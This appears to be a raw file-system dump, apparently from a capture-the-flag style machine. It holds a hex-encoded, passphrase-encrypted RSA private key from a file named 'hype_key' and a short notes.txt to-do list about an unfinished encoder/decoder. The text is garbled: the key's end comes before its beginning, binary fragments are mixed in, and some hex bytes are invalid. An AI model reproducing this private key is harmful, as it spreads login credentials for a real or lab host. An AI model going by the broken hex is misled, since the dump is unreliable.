6e 4b 6c 6f 58 76 6e 6c 50 4f 53 77 53 70 57 79 39 57 70 36 79 38 58 58 38 2b 46 34 30 72 78 6c 35 0d 0a 58 71 68 44 55 42 68 79 6b 31 43 33 59 50 4f 6f9 44 75 50 4f 6e 4d 58 61 49 70 65 31 64 67 62 30 4e 64 44 31 4d 39 5a 51 53 4e 55 4c 77 31 44 48 43 47 50 50 34 4a 53 53 78 58 37 42 57 64 44 4b 0d 0a 61 41 6e 57 4a 76 46 67 6c 41 34 6f 46 42 42 56 41 38 75 41 50 4d 66 56 32 58 46 51 6e 6a 77 55 54 35 62 50 4c 43 36 35 74 46 73 74 6f 52 74 54 5a 31 75 53 72 75 61 69 32 37 6b 78 54 6e 4c 51 0d 0a 2b 77 51 38 37 6c 4d 61 64 64 73 31 47 51 4e 65 47 73 4b 53 66 38 52 2f 72 73 52 4b 65 65 4b 63 69 6c 44 65 50 43 6a 65 61 4c 71 74 71 78 6e 68 4e 6f 46 74 67 30 4d 78 74 36 72 32 67 62 31 45 0d 0a 41 6c 6f 51 36 6a 67 35 54 62 6a 35 4a 37 71 75 59 58 5a 50 79 6c 42 6c 6a 4e 70 39 47 56 70 69 6e 50 63 33 4b 70 48 74 74 76 67 62 70 74 66 69 57 45 45 73 5a 59 6e 35 79 5a 50 68 55 72 39 51 0d 0a 72 30 38 70 6b 4f 78 41 72 58 45 32 64 6a 37 65 58 2b 62 71 36 35 36 33 35 4f 4a 36 54 71 48 62 41 6c 54 51 31 52 73 39 50 75 6c 72 53 37 4b 34 53 4c 58 37 6e 59 38 39 2f 52 5a 35 6f 53 51 65 0d 0a 32 56 57 52 79 54 
5a 31 46 66 6e 67 4a 53 73 76 39 2b 4d 66 76 7a 33 34 31 6gc 62 7a 4f 49 57 6d 6b 37 57 66 45 63 57 63 48 63 31 36 6e 39 56 30 49 62 53 4e 41 4c 6e 6a 54 68 76 45 63 50 6b 79 0d 0a 65 31 42 73 66 53 62 73 66 39 46 67 75 55 5a 6b 67 48 41 6e 6e 66 52 4b 6b 47 56 47 31 4f 56 79 75 77 63 2f 4c 56 6a 6d 62 68 5a 7a 4b 77 4c 68 61 5a 52 4e 64 38 48 45 4d 38 36 66 4e 6f 6a 50 0d 0a 30 39 6e 56 6a 54 61 59 74 57 55 58 6b 30 53 69 31 57 30 32 77 62 75 31 4e 7a 4c 2b 31 54 67 39 49 70 4e 79 49 53 46 43 46 59 6a 53 71 69 79 47 2b 57 55 37 49 77 4b 33 59 55 35 6b 70 33 43 43 0d 0a 64 59 53 63 7a 36 33 51 32 70 51 61 66 78 66 53 62 75 76 34 43 4d 6e 4e 70 64 69 72 56 4b 45 6f 35 6e 52 52 66 4b 2f 69 61 4c 33 58 31 52 33 44 78 56 38 65 53 59 46 4b 46 4c 36 70 71 70 75 58 0d 0a 63 59 35 59 5a 4a 47 41 70 2b 4a 78 73 6e 49 51 39 43 46 79 78 49 74 39 32 66 72 58 7a 6e 73 6a 68 6c 59 61 38 73 76 62 56 4e 4e 66 6b 2f 39 66 79 58 36 6f 70 32 34 72 4c 32 44 79 45 53 70 59 0d 0a 70 6e 73 75 6b 42 43 46 42 6b 5a 48 57 4e 4e 79 65 4e 37 62 35 47 68 54 56 43 6f 64 48 68 7a 48 56 46 65 68 54 75 42 72 70 2b 56 75 50 71 61 71 44 76 4d 43 56 65 31 44 5a 43 62 34 4d 6a 41 6a 0d 0a 4d 73 6c 66 2b 39 78 4b 2b 54 58 45 4c 33 69 63 6d 49 4f 42 52 64 50 79 77 36 65 2f 4a 6c 51 6c 56 52 6c 6d 53 68 46 70 49 38 65 62 2f 38 56 73 54 79 4a 53 65 2b 62 38 35 33 7a 75 56 32 71 4c 0d 0a 73 75 4c 61 42 4d 78 59 4b 6d 33 2b 7a 45 44 49 44 76 65 4b 50 4e 61 61 57 5a 67 45 63 71 78 79 6c 43 43 2f 77 55 79 55 58 6c 4d 4a 35 30 4e 77 36 4a 4e 56 4d 4d 38 4c 65 43 69 69 33 4f 45 57 0d 0a 6c 30 6c 6e 39 4c 31 62 2f 4e 58 70 48 6a 47 61 38 57 48 48 54 6a 6f 49 69 6c 42 35 71 4e 55 79 79 77 53 65 54 42 46 32 61 77 52 6c 58 48 39 42 72 6b 5a 47 34 46 63 34 67 64 6d 57 2f 49 7a 54 0d 0a 52 55 67 5a 6b 62 4d 51 5a 4e 49 49 66 7a 6a 31 51 75 69 6c 52 56 42 6d 2f 46 37 36 59 2f 59 4d 72 6d 6e 4d 39 6b 2f 31 78 53 47 49 73 6b 77 43 55 51 2b 39 35 43 47 48 4a 45 38 4d 6b 68 44 33 0d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 
20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d custom-colorsA !A Ey% oS$G'  notes.txtTo do: 1) Coffee. 2) Research. 3) Fix decoder/encoder before going live. 4) Make sure encoding/decoding is only done client-side. 5) Don't use the decoder/encoder until any of this is done. 6) Find a better way to take notes. custom-colorsA hA v#'  hype_key2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0d 0a 50 72 6f 63 2d 54 79 70 65 3a 20 34 2c 45 4e 43 52 59 50 54 45 44 0d 0a 44 45 4b 2d 49 6e 66 6f 3a 20 41 45 53 2d 31 32 38 2d 43 42 43 2c 41 45 42 38 38 43 31 34 30 46 36 39 42 46 32 30 37 34 37 38 38 44 45 32 34 41 45 34 38 44 34 3c